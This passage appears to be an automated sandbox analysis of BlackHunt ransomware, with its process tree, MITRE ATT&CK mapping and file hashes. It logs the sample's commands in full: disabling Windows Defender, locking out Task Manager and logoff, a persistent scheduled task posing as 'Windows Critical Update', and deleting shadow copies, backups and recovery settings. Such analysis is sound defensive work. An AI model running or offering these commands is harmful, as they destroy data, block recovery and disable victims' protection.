C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1396
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:3012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:4852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:4820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2360
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:4448
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:3484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:4348
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4340
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:324
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:5040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1348
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:408
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1508
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:4744
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:3648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2304
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3548
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:392
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4924
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:1432
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3256
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3352
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:4344
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:2708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4212
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:4388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe" /F2⤵PID:3840
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe" /F3⤵
- Creates scheduled task(s)
PID:2236
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:1984
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:5060
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2284
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3596
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3568
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1444
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4456
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3264
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2736
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2168
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1448
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:4356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4284
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:4236
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4236
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:4980
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:2516
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
3File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5bb796b08eb66b04941c187e30f44dd0f
SHA1cdb41ca3dc6ef5e73fb4d0902f3b0910613b3b09
SHA256ea11c9926855bfe9eeeec912e8e4df9504a0a6e3acc4f72b690cb94980fb8131
SHA51235262fefde71751304461348b00dfe6edebb25768bb332bcfd578cc39d0114a2c11a4ade55130c51ee2979231423adedf70782b15d1105746ab1f01650c6464a
-
Filesize
12KB
MD5f2bfe9b913038bf8d125358fd06c68d6
SHA1dac67ca71231ba34d2524719097f6a740b222c8a
SHA256775f58d523c1b162cb132660d0db52a9b53f17592caa9bf0cab1c2f7efb3ba81
SHA51206362f33aecf9ae44e44e9be6ddf0dbff4aede46ae3bbb4f908924885ff34b60329c3e2f049d5686cba2ff817c0ab4f6c36a6aa6c15cfbb005a3999e36c635b3
-
Filesize
684B
MD50a47e5a7e418862f524728ecce3b3dfc
SHA16360291863daf3d2c4c6883702ec2452061a1b01
SHA2566310f54fcaf14c43c2792c25b5256403f1ec00e3587c2ec5859c17f6cf52785e
SHA51272cbda2c01a2b47d18b5151b1ef57b92b12c2f3874627b0d438cd52cf8ac7d32e80d0775469115e0359a5f73235aa76dde893823ead4632828a172f30aa3babd